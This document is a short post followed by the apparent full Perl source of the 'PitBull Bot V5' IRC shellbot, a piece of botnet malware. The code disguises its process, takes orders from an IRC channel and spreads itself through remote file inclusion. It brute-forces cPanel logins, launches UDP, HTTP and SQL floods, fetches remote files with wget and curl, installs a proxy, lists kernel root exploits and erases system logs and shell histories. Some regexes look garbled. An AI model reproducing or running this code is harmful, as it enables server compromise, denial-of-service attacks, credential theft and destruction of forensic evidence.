This is fubar the ngrBot creator “made from scratch”
#!/usr/bin/perl
#system 'cd /tmp;rm -rf *';
#
# PitBull Bot V5 PRiVaTE Sh3llBoT
#
# Last edited : 25/2/2008
#
#[@[PitBull Bot V5 Commands List]@]
#[@-----[Shellbot/Hacking Based]-----@]
#!bot @admins
#!bot @spread <rfi>
#!bot @milw0rm
#!bot @packetstorm
#!bot @portscan <host>
#!bot @logcleaner
#!bot @md5 <hash>
#!bot @sendmail <subject> <sender> <recipient> <message>
#!bot @vnc <B-Class>
#!bot @boxip
#!bot @socks5
#!bot @cleartmp
#!bot @portchk <host> <port>
#!bot @proxy <a|t|e>
#!bot @rootable
#!bot @modules
#!bot @cpanel <host> <user> <port>
#!bot @visit <url>
#!bot @shellfind <c99/r57/mys/phm/rem>
#[@-----[IRC Based]-----@]
#!bot @join <#channel>
#!bot @part <#channel>
#!bot @quit <reason>
#!bot @voice <who>
#!bot @devoice <who>
#!bot @halfop <who>
#!bot @dehalfop <who>
#!bot @op <who>
#!bot @deop <who>
#!bot @owner <who>
#!bot @deowner <who>
#[@-----[DDos Based]-----@]
#!bot @udpflood <host> <packetsize> <time>
#!bot @httpflood <host> <time>
#!bot @sqlflood <host> <time>
#[@-----[Flooding Based]-----@]
#!bot @msgflood <who>
#!bot @dccflood <who>
#!bot @ctcpflood <who>
#!bot @noticeflood <who>
#!bot @channelflood
#!bot @maxiflood <who>
#[@[PitBull Bot V5 Commands List]@]
#
# Sh3llBoT
#
######################
#print " After installation, Linux requires configuration and systems administration. Corporate systems need monitoring, backups, updates, as well as system and user management. Ubuntu (apt), CentOS, Fedora and Red Hat (rpm/YUM) server and desktop systems adminstration are covered by this script. Please dont exit the script or it will result in a broken linux partition";
######################
# Specify your data:
#--------------------------------------------------------------#
my $max_lines= '10';
my $sleeping= '3';
my $prefix = "f"; # "!" is included :)
my $spread = "http://www.pastie.org/315683.txt";
my @admins = ("fubar");
my @hostauth= ("y.is.a.g00d.day.t0.d.ie");
#--------------------------------------------------------------#
$server= 'irc.sys32.net' unless $server;
my $port= '1776';
my @channel= ("#rfi#");
my @nickname = ("fub0t|");
my $nick = $nickname[rand scalar @nickname];
my $ircname = 'fub0t';
chop (my $realname = "fub0t');
#--------------------------------------------------------------#
my $httpmodule;
my $usermodule;
my $lwpmodule;
my $filemodule;
#--------------------------------------------------------------#
my @cpanelpasswds = ("1","12","967qeikt","123","1234","12345","123456","1234567","12345678","123456789","1234567890","admin","root",
"pass","passwd","password","Pass","Passwd","PassWd","PassWord","pwd","login","Admin","admin","test","123123","1212",
"12341234","zxcvbnm","zxcvbn","zxcvb","zxcv","zxc","q1w2e3r4","q1w2e3","q1w2e3r4t5","1q2w3e4r5t","1q2w3e4r","1q2w3e",
"demo","morgan","ferrari","italia","usa","clinton","dart","call","asdf","asdfg","asdfgh","qazwsx","qazxsw","qwertyu",
"qwertyuiop","qwertyuio","qwertyu","qwerty","qwert","qwer","james","hosting","temp","test1","test12","test123","tester",
"testing","cpanel","default","Login","admin.","cpanels","web","master","webmaster","dark","support","darby","mail",
"dick","mary","evil","nissan","toyota","kingkong","superman","super","supra","data","service","server","weed","abc",
"abc123","hello","terror","binladen","europe","website","mypass","pass1","pass12","pass123","pass1234","passwd1");
#--------------------------------------------------------------#
# End here :)
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
eval "use HTTP::Request;"; if ($@) {
$httpmodule= "4No";
}
else{
$httpmodule= "4Yes";
}
eval "use LWP::UserAgent;"; if ($@) {
$usermodule= "4No";
}
else{
$usermodule= "4Yes";
}
eval "require LWP;"; if ($@) {
$lwpmodule= "4No";
}
else{
$lwpmodule= "4Yes";
}
eval "use FileHandle;"; if ($@) {
$filemodule= "4No";
}
else{
$filemodule= "4Yes";
}
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
#Connect
$server="$ARGV[0]" if $ARGV[0];
# Real psx! - by xeQt.
my $uid=`id -u`;
if ($uid =~ /^0$/)
{
$0=$xeQters."�"x16;;
chdir($rootpath);
}
else
{
@processer=`ps x|grep -E "http|httpd|apache|apache2|mysql|postgrep|smbd"`; # Grab from real ps!
foreach $lines (@processer)
{
if (($lines =~ //(.+)/)&&($lines !~ /grep/i)&&($lines !~ /perl/i))
{
if (($lines!~/wget/i)&&($lines!~/curl/i)&&($lines!~/fetch/i)&&($lines!~/GET/i)&&($lines!~/lwp-download/i))
{
$bg=$1;
}
}
if (($bg =~ /^//i) || ($bg =~ /^///i) || ($bg =~ /^[.+?]$/i))
{
$bg="$bg";
}
else
{
$bg="/$bg";
}
if ((length($bg) <= 3) || ($bg =~ /.txt$/i))
{
$bg=$fakeps[rand scalar @fakeps];
}
$0="$bg"."�"x16;;
chdir($userpath);
}
}
my $pid=fork;
exit if $pid;
die "Error: Fork(): $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]n";
} else {#342
print $IRC_cur_socket "$_[0]n";
}
}
sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con",
PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /r$/) {
parse("$line");
} elsif ($line =~ /^(S+) NOTICE AUTH :***/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING :(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) PRIVMSG (.+?) :(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^�01VERSION�01$/) {
notice("$pn", "�01VERSION mIRC v6.31 The_PitBull�01");
}
if (grep {$_ =~ /^Q$hostmaskE$/i } @hostauth ) {
if (grep {$_ =~ /^Q$pnE$/i } @admins ) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
#-#-#-#-#-#-#-#-#
# PREFIX #
#-#-#-#-#-#-#-#-#
if ($args =~ /^(Q$meunickE|!$prefix)s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^!nick/);
} elsif ($arg =~ /^@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
}
#-#-#-#-#-#-#-#-#
# NICKNAME OPT.#
#-#-#-#-#-#-#-#-#
elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?)s+NICKs+:(S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^:(.+?)s+433/i) {
nick("$meunick".int rand(999999));
} elsif ($servarg =~ m/^:(.+?)s+001s+(S+)s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@channel) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
#-#-#-#-#-#-#-#-#
# Commands #
#-#-#-#-#-#-#-#-#
# Show commands of the bot.
if ($funcarg =~ /^commands/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@[PitBull Bot V5 Commands List]4@12] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@-----[Shellbot/Hacking Based]-----4@12] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1admins ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1spread <rfi> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1milw0rm ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1packetstorm ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1portscan <host> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1logcleaner ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1md5 <hash> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1sendmail <subject> <sender> <recipient> <message> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1vnc <B-Class> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1boxip ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1socks5 ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1cleartmp ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1portchk <host> <port> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1proxy <a|t|e> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1rootable ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1modules ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1cpanel <host> <user> <port> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1visit <url> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1shellfind <c99/r57/mys/phm/rem> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@-----[IRC Based]-----4@12] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1join <#channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1part <#channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1quit <reason> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1voice <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1devoice <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1halfop <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1dehalfop <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1op <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1deop <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@-----[DDos Based]-----4@12] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1udpflood <host> <packetsize> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1httpflood <host> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1sqlflood <host> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@-----[Flooding Based]-----4@12] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1msgflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1dccflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1ctcpflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1noticeflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1channelflood");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@1maxiflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@[PitBull Bot V5 Commands List]4@12] ");
}
# Shell finder based on the code of DiA/RRLF.
if ($funcarg =~ /^shellfinds+(.*)/) {
my $type=$1;
my @searchTerm;
my @checkTerm;
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ShellFinder12] Started for finding4 ".$type." 12shell ");
if($type eq "r57") {
push(@searchTerm, "inurl:r57.php");
push(@searchTerm, ""[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]"");
push(@searchTerm, "intitle:r57shell");
push(@checkTerm, "r57");
push(@checkTerm, "safe_mode");
}
elsif($type eq "c99") {
push(@searchTerm, "inurl:c99.php");
push(@searchTerm, ""Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"");
push(@searchTerm, "intitle:" - phpshell"");
push(@searchTerm, "intitle:" - c99shell"");
push(@checkTerm, "c99");
push(@checkTerm, "Safe-mode");
}
elsif($type eq "mys") {
push(@searchTerm, ""Auto error traping enabled"");
push(@searchTerm, "intitle:"MyShell 1.1.0 build 20010923"");
push(@checkTerm, "MyShell");
push(@checkTerm, "Echo commands");
}
elsif($type eq "phs") {
push(@searchTerm, "intitle:"PHP Shell 1.5"");
push(@searchTerm, "intitle:"PHP Shell 1.6"");
push(@searchTerm, "intitle:"PHP Shell 1.7"");
push(@searchTerm, ""Enable stderr-trapping?"");
push(@checkTerm, "PHP Shell");
push(@checkTerm, "Choose new working");
}
elsif($type eq "phm") {
push(@searchTerm, ""PHPShell by Macker"");
push(@searchTerm, ""[ Main Menu ] [ PHPKonsole ] [ Haxplorer ]"");
push(@checkTerm, "Haxplorer");
push(@checkTerm, "PHPKonsole");
}
elsif($type eq "rem") {
push(@searchTerm, "intitle:"phpRemoteView: "");
push(@searchTerm, ""REMVIEW TOOLS"");
push(@checkTerm, "phpRemoteView");
push(@checkTerm, "perms");
}
my $userAgent = LWP::UserAgent->new;
$userAgent->agent("User-Agent=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5");
my @resultLinks;
foreach(@searchTerm) {
my $isLastPage = 0;
for(my $gPage = 0; ; $gPage++) {
if($isLastPage == 1) { last; }
my $gRequest = HTTP::Request->new(GET => "http://www.google.de/search?q=$_&start=$gPage"."0");
my $gResource = $userAgent->request($gRequest);
if($gResource->is_success) {
my @gContent = split("<div class=g>", $gResource->content);
if(@gContent < 10) { $isLastPage = 1; };
for(my $gPiece = 1; $gPiece < @gContent; $gPiece++) {
my $shellLink = substr($gContent[$gPiece], index($gContent[$gPiece], "href="") + 6);
$shellLink = substr($shellLink, 0, index($shellLink, """));
my $sRequest = HTTP::Request->new(GET => $shellLink);
my $sResource = $userAgent->request($sRequest);
if($sResource->is_success) {
if(index($sResource->content, $checkTerm[0]) != -1 && index($sResource->content, $checkTerm[1]) != -1) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ShellFinder12]4 [".$type."] 12Link:4 ".$shellLink." ");
}
}
}
sleep 20; #wait 20 seconds so google dont think we are a bot
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ShellFinder12] Google blacklisted! ");
}
}
}
}
# Show admins of the bot.
if ($funcarg =~ /^admins/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Admins12] The Admins of the bot are :4 @admins ");
}
# ModuleCheck to c wich we are using
if ($funcarg =~ /^modules/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ModuleCheck12] HTTP::Request: ".$httpmodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ModuleCheck12] LWP::Useragent: ".$usermodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ModuleCheck12] LWP: ".$lwpmodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ModuleCheck12] FileHandle: ".$filemodule." ");
}
# URL Visitor
if ($funcarg =~ /^visits+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@URLVisit12] Visiting");
my $side=$1;
my $set = fix_url($side);
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; }
else {
eval "use HTTP::Request;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@URLVisit12] HTTP::Request not found ");
}
eval "use LWP::UserAgent;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@URLVisit12] LWP::UserAgent not found ");
}
my $siden=fix_url($side);
my $req=HTTP::Request->new(GET=>$siden);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
my $mrx=$response->content;
if ($response->is_success) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@URLVisit12] Visited4 ".$siden.".");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Error: ".$siden."");
}
}
exit;
}
}
# Spread the bot on a rfi. Make sure that your $spread is configured right !.
if ($funcarg =~ /^spreads+(.*)/) {
$vuln = $1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Spreader12] Spreading bot on :4 $vuln");
my $shellurl="http://".$vuln.$spread."?";
my $reqz=HTTP::Request->new(GET=>$shellurl);
my $ua=LWP::UserAgent->new();
my $response=$ua->request($reqz);
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Spreader12] Bot is Spreaded on :4 $vuln");
}
# MD5 Decrypter by my friend iNs ;).
if ($funcarg =~ /^md5s+(.*)/) {
&ice($printl,$1);
&gdata($printl,$1);
&redn($printl,$1);
&xpz($printl,$1);
&ben($printl,$1);
&alim($printl,$1);
&cry($printl,$1);
}
# Get the latest bugs from milw0rm.
if ($funcarg =~ /^milw0rm/) {
my @ltt=();
my @bug=();
my $x;
my $page="";
my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
print $socke "GET http://milw0rm.com/rss.php HTTP/1.0rnHost: milw0rm.comrnAccept: */*rnUser-Agent: Mozilla/5.0rnrn";
my @r = <$socke>;
$page="@r";
close($socke);
while ($page =~ m/<title>(.*)</g){
$x = $1;
if ($x =~ /</) {
$x =~ s/</</g;
}
if ($x !~ /milw0rm/) {
push (@bug,$x);
}}
while ($page =~ m/<link.*expl.*([0-9]...)</g) {
if ($1 !~ m/milw0rm.com|exploits|en/){
push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
}}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Milw0rm12]12 Latest exploits :");
foreach $x (0..(@ltt - 1)) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Milw0rm12]12 $bug[$x] - $ltt[$x]");
sleep 1;
}}
# Get the IP of the box
if ($funcarg =~ /^boxip/) {
$net = `/sbin/ifconfig | grep 'eth0'`;
if (length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet addr'`;
if (!length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet end.'`;
}
if (length($net))
{
chop($net);
@netip = split/:/,$net;
$netip[1] =~ /(d{1,3}).(d{1,3}).(d{1,3}).(d{1,3})/;
$ip = $1 .".". $2 .".". $3 .".". $4;
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@IP12]12 IP of B0X :4 ". $ip ." ");
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@IP12]12 IP of B0X :4 Not founded ");
}
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@IP12]12 IP of B0X :4 Error ");
}
}
#cPanel Bruter by xeQt modded by The_PitBull
if ($funcarg =~ /^cpanels+(S+)s+(S+)s+(d+)/) {
my $haddr=$1;
my $cuser=$2;
my $cport=$3;
my $countcp=0;
eval "use IO::Socket;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ModuleCheck12]12 IO::Socket Not Found"); return;
}
eval "use LWP::Simple;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ModuleCheck12]12 LWP::Simple Not Found"); return;
}
eval "use MIME::Base64;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@ModuleCheck12]12 MIME::Base64 Not Found"); return;
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@cPanelBruter12]12 Starting Bruter");
foreach my $P (@cpanelpasswds) {
$countcp++;
chomp $P;
$passwd = $P;
$authx = encode_base64($cuser.":".$passwd);
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$haddr", PeerPort => "$cport") || die "Error connect ro hostn";
print $sock "GET / HTTP/1.1n";
print $sock "Authorization: Basic $authxn";
print $sock "Connection: Closenn";
read $sock, $answer, 128;
close($sock);
if ($answer =~ /Moved/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@cPanelBruter12]12 Cracked ".$haddr.":".$cport." - l/p:".$cuser.":".$passwd." - Done.");
return;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@cPanelBruter12]12 Tested ".$countcp." password(s) without luck!");
}
#Auto Install Socks V5 using Mocks
if ($funcarg =~ /^socks5/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@SocksV512]12 Installing Mocks please wait4");
system 'cd /tmp';
system 'wget http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz';
system 'tar -xvfz mocks-0.0.2.tar.gz';
system 'rm -rf mocks-0.0.2.tar.gz';
system 'cd mocks-0.0.2';
system 'rm -rf mocks.conf';
system 'curl -O http://andromeda.covers.de/221/mocks.conf';
system 'touch mocks.log';
system 'chmod 0 mocks.log';
sleep(2);
system './mocks start';
sleep(4);
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@SocksV512]12 Looks like its succesfully installed lets do the last things4 ");
#lets grab ip
$net = `/sbin/ifconfig | grep 'eth0'`;
if (length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet addr'`;
if (!length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet end.'`;
}
if (length($net))
{
chop($net);
@netip = split/:/,$net;
$netip[1] =~ /(d{1,3}).(d{1,3}).(d{1,3}).(d{1,3})/;
$ip = $1 .".". $2 .".". $3 .".". $4;
#and print it ^^
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@SocksV512]12 Connect here :4 ". $ip .":8787 ");
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@SocksV512]12 IP not founded ");
}
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@SocksV512]12 ERROR WHILE INSTALLING MOCKS ");
}
}
# A portscanner, @portscan <host>
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Portscan12]12 Scanning for open ports on 4 ".$1." 12 started .");
foreach my $port (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $port, Proto =>
'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $port);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Portscan12]12 Open ports founded: @aberta");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Portscan12]12 No open ports foundend.");
}
}
# A logcleaner, most effective when you are uid=0
if ($funcarg =~ /^logcleaner/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] This process can be long, just wait");
system 'rm -rf /var/log/lastlog';
system 'rm -rf /var/log/wtmp';
system 'rm -rf /etc/wtmp';
system 'rm -rf /var/run/utmp';
system 'rm -rf /etc/utmp';
system 'rm -rf /var/log';
system 'rm -rf /var/logs';
system 'rm -rf /var/adm';
system 'rm -rf /var/apache/log';
system 'rm -rf /var/apache/logs';
system 'rm -rf /usr/local/apache/log';
system 'rm -rf /usr/local/apache/logs';
system 'rm -rf /root/.bash_history';
system 'rm -rf /root/.ksh_history';
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] All default log and bash_history files erased");
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] Now Erasing the rest of the machine log files");
system 'find / -name *.bash_history -exec rm -rf {} ;';
system 'find / -name *.bash_logout -exec rm -rf {} ;';
system 'find / -name "log*" -exec rm -rf {} ;';
system 'find / -name *.log -exec rm -rf {} ;';
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] Done! All logs erased");
}
# A /tmp cleaner
if ($funcarg =~ /^cleartmp/) {
system 'cd /tmp;rm -rf *';
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@TMPCleaner12] /tmp is Cleaned");
}
# Check if a host have a port open.
if ($funcarg =~ /^portchks+(.*)s+(d+)/) {
my $host=$1;
my $port=$2;
my $scansock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => 8);
if ($scansock)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@PortChk12] Port:4 ".$port." 12is open on the host4 ".$host." ");
$scansock->close;
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@PortChk12] Port:4 ".$port." 12is closed on the host4 ".$host." ");
}
}
# Chk The News from PacketStorm
if ($funcarg =~ /^packetstorm/) {
my $c=0;
my $x;
my @ttt=();
my @ttt1=();
my $sock = IO::Socket::INET->new(PeerAddr=>"www.packetstormsecurity.org",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET /whatsnew20.xml HTTP/1.0rn";
print $sock "Host: www.packetstormsecurity.orgrn";
print $sock "Accept: */*rn";
print $sock "User-Agent: Mozilla/5.0rnrn";
my @r = <$sock>;
$page="@r";
close($sock);
while ($page =~ m/<link>(.*)</link>/g)
{
push(@ttt,$1);
}
while ($page =~ m/<description>(.*)</description>/g)
{
push(@ttt1,$1);
}
foreach $x (0..(@ttt - 1))
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@PacketStorm12] ".$ttt[$x]." ".$ttt1[$x]."");
sleep 3;
$c++;
}
}
if ($funcarg =~ /^rootable/) {
my $khost = `uname -r`;
my $currentid = `whoami`;
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Rootable12] Currently you are ".$currentid." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Rootable12] The kernel of this box is ".$khost." ");
chomp($khost);
my %h;
$h{'w00t'} = {
vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20']
};
$h{'brk'} = {
vuln=>['2.4.22','2.4.21','2.4.10','2.4.20']
};
$h{'ave'} = {
vuln=>['2.4.19','2.4.20']
};
$h{'elflbl'} = {
vuln=>['2.4.29']
};
$h{'elfdump'} = {
vuln=>['2.4.27']
};
$h{'expand_stack'} = {
vuln=>['2.4.29']
};
$h{'h00lyshit'} = {
vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13','2.6.14','2.6.15','2.6.16','2.6.2']
};
$h{'kdump'} = {
vuln=>['2.6.13']
};
$h{'km2'} = {
vuln=>['2.4.18','2.4.22']
};
$h{'krad'} = {
vuln=>['2.6.11']
};
$h{'krad3'} = {
vuln=>['2.6.11','2.6.9']
};
$h{'local26'} = {
vuln=>['2.6.13']
};
$h{'loko'} = {
vuln=>['2.4.22','2.4.23','2.4.24']
};
$h{'mremap_pte'} = {
vuln=>['2.4.20','2.2.25','2.4.24']
};
$h{'newlocal'} = {
vuln=>['2.4.17','2.4.19','2.4.18']
};
$h{'ong_bak'} = {
vuln=>['2.4.','2.6.']
};
$h{'ptrace'} = {
vuln=>['2.2.','2.4.22']
};
$h{'ptrace_kmod'} = {
vuln=>['2.4.2']
};
$h{'ptrace24'} = {
vuln=>['2.4.9']
};
$h{'pwned'} = {
vuln=>['2.4.','2.6.']
};
$h{'py2'} = {
vuln=>['2.6.9','2.6.17','2.6.15','2.6.13']
};
$h{'raptor_prctl'} = {
vuln=>['2.6.13','2.6.17','2.6.16','2.6.13']
};
$h{'prctl3'} = {
vuln=>['2.6.13','2.6.17','2.6.9']
};
$h{'remap'} = {
vuln=>['2.4.']
};
$h{'rip'} = {
vuln=>['2.2.']
};
$h{'stackgrow2'} = {
vuln=>['2.4.29','2.6.10']
};
$h{'uselib24'} = {
vuln=>['2.4.29','2.6.10','2.4.22','2.4.25']
};
$h{'newsmp'} = {
vuln=>['2.6.']
};
$h{'smpracer'} = {
vuln=>['2.4.29']
};
